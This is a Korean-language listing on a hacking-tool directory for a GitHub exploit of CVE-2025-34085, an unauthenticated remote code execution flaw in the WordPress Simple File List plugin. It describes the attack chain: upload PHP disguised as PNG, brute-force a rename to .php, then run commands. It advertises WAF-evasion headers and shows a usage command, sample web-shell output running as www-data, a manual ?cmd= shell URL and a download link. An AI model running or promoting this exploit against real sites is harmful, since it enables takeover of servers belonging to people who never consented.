Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/mrjhaxcore/cve-2025-34085
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

Simple File List – 인증되지 않은 RCE 익스플로잇 (CVE-2025-34085)

저장소 보기
121년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

📂 Simple File List – 인증되지 않은 RCE 익스플로잇 (CVE-2025-34085)

⚠️ 익스플로잇 코드 작성자: Mrj Haxcore

WordPress Simple File List 플러그인(<= 4.2.3)에 대한 완전히 작동하는 Python 익스플로잇입니다. 이 플러그인은 안전하지 않은 파일 업로드 및 이름 변경 로직으로 인해 인증되지 않은 원격 코드 실행(RCE) 취약점이 있습니다.


💣 취약점 요약

  • 플러그인: Simple File List (simple-file-list)
  • 버전: <= 4.2.3
  • CVE: CVE-2025-34085
  • 영향: 인증되지 않은 사용자가 .png로 위장한 PHP 파일을 업로드한 후, 이를 .php로 이름을 변경하고 임의 코드를 실행할 수 있습니다.
  • 요구사항: 인증 불필요
  • 익스플로잇 유형: 파일 업로드 → 이름 변경 우회 → 명령 실행

✅ 기능

  • 🚀 완전 자동화된 익스플로잇 체인
  • 📤 수동 multipart/form-data 빌더 (415 우회)
  • 🔁 .php, .php5, .phtml 등에 대한 이름 변경 무차별 대입
  • 🛡️ WAF 우회를 위한 현실적인 위장 헤더
  • 🐚 ?cmd=를 통한 명령 실행
  • 🧼 깔끔한 출력 (�PNG 쓰레기 없음)

🛠 사용법

root@kitploit:~
python3 simple.py https://target.site

[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Manual Visit

https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
도구 다운로드